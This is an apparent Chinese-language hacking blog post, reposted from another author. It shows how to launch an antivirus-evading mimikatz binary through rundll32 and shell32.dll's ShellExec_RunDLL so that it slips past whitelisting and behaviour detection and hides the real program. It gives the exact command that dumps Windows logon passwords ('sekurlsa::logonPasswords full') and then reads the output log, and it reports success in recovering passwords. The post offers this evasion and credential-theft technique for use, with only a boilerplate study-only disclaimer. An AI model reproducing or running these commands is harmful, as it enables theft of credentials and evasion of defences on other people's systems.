骚姿势之shell32.dll执行getpass

  • 内容
  • 相关

最近在做安全维持的时候看到的,找到的一位大佬的文章,受益匪浅  丢在自己博客上做一个统计

系统文件shell32.dll是存放在Windows\System32系统文件夹中的重要文件,通常情况下是在安装操作系统过程中自动创建的,对于系统正常运行来说至关重要
系统文件sshell32.dll是Windows的32位外壳动态链接库文件,用于打开网页和文件,建立文件时的默认文件名的设置等大量功能。它提供了explorer.exe的功能,比如”找开“,”运行程序“等,我们可以使用IDA打开这个DLL然后查看导出表。
1.png

先将免杀过后的mimikatz上传到目标机上,利用shell32的目的在于能够执行,绕过一些杀毒白名单之类的操作,再或者通用的cmd /c 方式可能会触发行为查杀拦截。

rundll32.exe shell32.dll,ShellExec_RunDLL c:\Users\mac\Desktop\a\a "log" "privilege::debug" "sekurlsa::logonPasswords full" "exit"
2.png



type c:\windows\system32\mimikatz.log
3.png


成功绕过,并查看到密码

5.jpg

就是被拦截也是没有显示出你的mimikatz执行的动态,显示的提醒是rundll32,和shell32.dll恶意执行。这样就隐藏了真实被执行的软件6.png

原文链接:Go

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗已收录]

本文链接:骚姿势之shell32.dll执行getpass - https://www.0dayhack.com/post-884.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注